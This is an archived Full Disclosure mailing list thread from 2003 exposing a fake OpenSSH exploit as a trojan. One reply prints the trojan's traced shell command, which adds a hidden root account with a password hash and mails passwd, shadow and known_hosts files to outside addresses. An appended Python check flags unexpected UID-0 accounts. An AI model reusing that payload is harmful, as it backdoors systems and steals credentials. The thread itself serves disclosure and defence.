Full Disclosure mailing list archives
Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!*
From: "V.O." <vosipov () tpg com au>
Date: Fri, 19 Sep 2003 20:27:18 +1000
Another good example of why closed-source exploits and "private" exploits are bad (although it is an old story already). The rumours of their existence can make people (or should I say, script kiddies) fall for something like this one. Btw the most definite opinion on the exploit I have heard several times is that there exists one for rooting openbsd, but "it is unstable... we would not show it to anybody because it is so kludgy...etc."

W.

----- Original Message -----
From: "Raymond Dijkxhoorn" <raymond () prolocation net>
To: "Vitaly Osipov" <vosipov () tpg com au>
Cc: <full-disclosure () lists netsys com>
Sent: Friday, September 19, 2003 7:40 PM
Subject: Re: [Full-disclosure] Re: new openssh exploit in the wild! * is FAKE AS SH@!*

> Hi!
>
> > > i looked at this piece of exploit... it is binary so i'm not sure if
> > > this is a trojan or a backdoor or a virus. but i can't see anything
> > > strange while sniffing the exploit traffic. and i got root on several
> > > of my openbsd boxes with that. the bruteforcer seems to be very good.
> >
> > which is obviously not true. Btw as far as I understand, the trojan code
> > is triggered when the "exploit" is run with the offset specified, and not
> > in a "bruteforcing" mode.
>
> He most likely means, he rooted some of his own boxes where he tried to
> run the 'exploit'. Nice piece of social engineering.
>
> printf("[*] sending shellcode\n")= 22
> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp|/usr/sbin/sendmail -f ownage_at_gmx.de m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 0x0804a6b0
>
> Bye,
> Raymond.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
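A defensive check for the first thing the popen() call in the trace above does, which is to append a second UID-0 account (sys3) to /etc/passwd and /etc/shadow. This is an added example, not part of the original thread; the function names and the sample data, including the placeholder hashes, are constructed for illustration.

```python
"""Flag UID-0 accounts other than root and rate whether they can log in."""

# Constructed sample data. The sys3 passwd entry has the shape of the line
# shown in the trace; all shadow hashes are placeholders, not real hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:alt root:/root:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
sys3:x:0:103::/:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$PLACEHOLDER$roothash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
toor:!:19000:0:99999:7:::
alice:$6$PLACEHOLDER$alicehash:19000:0:99999:7:::
sys3:$1$PLACEHOLDER$sys3hash:12311:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_colon_file(text, min_fields):
    """Yield field lists for well-formed lines; skip blanks and comments."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= min_fields:
            yield fields


def find_uid0_accounts(passwd_text, shadow_text, allowed=("root",)):
    """Return one finding per UID-0 account whose name is not in `allowed`."""
    hashes = {f[0]: f[1] for f in parse_colon_file(shadow_text, 2)}
    findings = []
    for fields in parse_colon_file(passwd_text, 7):
        name, uid, gid, shell = fields[0], fields[2], fields[3], fields[6]
        if uid != "0" or name in allowed:
            continue
        # No shadow entry, or a field starting with '!' or '*', means locked.
        locked = hashes.get(name, "*")[:1] in ("!", "*")
        can_login = shell not in NOLOGIN_SHELLS and not locked
        findings.append({"user": name, "gid": gid, "shell": shell,
                         "severity": "high" if can_login else "review"})
    return findings
```

On a live host, pass the contents of /etc/passwd and /etc/shadow (read as root) instead of the sample strings.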